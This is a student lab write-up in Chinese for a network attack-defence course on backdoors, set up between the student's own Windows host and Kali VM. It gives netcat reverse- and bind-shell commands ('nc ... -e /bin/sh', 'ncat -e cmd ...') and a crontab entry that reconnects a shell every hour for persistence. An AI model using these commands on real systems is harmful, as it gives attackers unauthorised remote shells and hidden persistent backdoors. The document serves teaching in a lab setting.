1. 程式人生 > 其它 >網路對抗技術Exp2-後門原理與實踐

網路對抗技術Exp2-後門原理與實踐

20191218 Exp2-後門原理與實踐

實驗內容

一、使用netcat獲取主機操作Shell,啟動cron

環境

  • 主機:Windows 10;
  • 靶機:Kali Linux Debian 10;
    實驗步驟
  1. 在主機上用ifconfig檢視Windows10主機IP

    主機IP為192.168.1.105
  2. 在Kali虛擬機器中用sudo ipconfig檢視Kali虛擬機器IP

    Kali虛擬機器IP為192.168.174.141
  3. 在主機中使用ncat -l -p 1218(學號後四位)監聽本機的1218埠
  4. 在主機中獲取虛擬機器shell
  • 在虛擬機器中使用nc 192.168.1.105(主機IP) 1218 -e /bin/sh
    連線主機反彈shell
  • 成功getshell
  1. 在虛擬機器中獲取主機shell
  • 在虛擬機器中用nc -l -p 1218監聽主機1218埠
  • 在主機中用ncat -e cmd 192.168.174.141 1218,成功獲取到主機shell
  1. 在虛擬機器中啟動cron並在主機監聽
  • 先在虛擬機器上用crontab -e指令編輯一條定時任務(crontab指令增加一條定時任務,-e表示編輯,輸入2表示選擇vim編輯器)

  • 在最後一行新增18 * * * * nc 192.168.211.1 1218 -e /bin/sh,即在每個小時的第18分鐘反向連線Windows主機的1218埠

  • 等到每小時的18分,在ip地址為192.168.1.105的主機端用ncat -l -p 1218開啟監聽即可

    在主機成功獲取虛擬機器的shell

    此外,也可以開一個非反彈式後門,在cron中寫入nc -l -p 1218 -e /bin/sh,這是攻擊機能隨時通過nc 主機ip 1218獲得虛擬機器的一個Shell